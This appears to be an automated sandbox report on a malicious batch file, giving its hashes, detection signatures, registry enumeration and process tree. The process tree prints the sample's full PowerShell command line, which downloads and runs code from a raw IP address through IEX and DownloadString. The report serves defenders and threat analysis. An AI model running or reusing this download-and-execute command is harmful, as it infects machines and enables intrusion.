Analysis
- max time kernel: 103s
- max time network: 123s
- platform: windows10_x64
- resource: win10v191014
- submitted: 10-02-2020 20:10
Static task: static1
Behavioral task: behavioral1
- Sample: hvQ21ebW.bat
- Resource: win7v191014 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: hvQ21ebW.bat
- Resource: win10v191014 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: hvQ21ebW.bat
- Size: 191B
- MD5: 7eb2eb2bf474386d8d7eef5ee2aaf3ef
- SHA1: c9789a38150044b9ca8a4b9d350df691611f1861
- SHA256: 29b2a12ef2c75d6bb1bdbb4536e478a386dc4082a0756adc219bbd25c724bd1c
- SHA512: 827139be92e830cc7e7d6ac935327fe8960508ecb5e59cf338fb3cd2cc7cda12ae5686f15709bf5fec2cfb399912a9803f7b372601802bcd27e928072638b512
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source (ps1.dropper) URLs: http://185.103.242.78/pastes/hvQ21ebW
Signatures
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description / pid / process):
    Token: SeRestorePrivilege  5092  WerFault.exe
    Token: SeBackupPrivilege   5092  WerFault.exe
    Token: SeDebugPrivilege    5092  WerFault.exe
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes (pid / process):
    5092  WerFault.exe  (18 identical entries)
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description / ioc / process):
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WerFault.exe
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0  WerFault.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  WerFault.exe
- Enumerates system info in registry (2 TTPs, 2 IoCs)
  Processes (description / ioc / process):
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS  WerFault.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  WerFault.exe
- Program crash (1 IoC)
  Processes (pid / process):
    5092  WerFault.exe
Processes (process tree; indentation shows parent/child relationship)
- C:\Windows\system32\cmd.exe (PID: 4984)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hvQ21ebW.bat"
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID: 5028)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/hvQ21ebW');Invoke-PBEESOQZ;Start-Sleep -s 10000"
    - C:\Windows\SysWOW64\WerFault.exe (PID: 5092)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 704
      Signatures:
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Checks processor information in registry
      - Enumerates system info in registry
      - Program crash
- \??\c:\windows\system32\taskhostw.exe (PID: 2976)
  Command line: taskhostw.exe -RegisterDevice -SettingChange -Full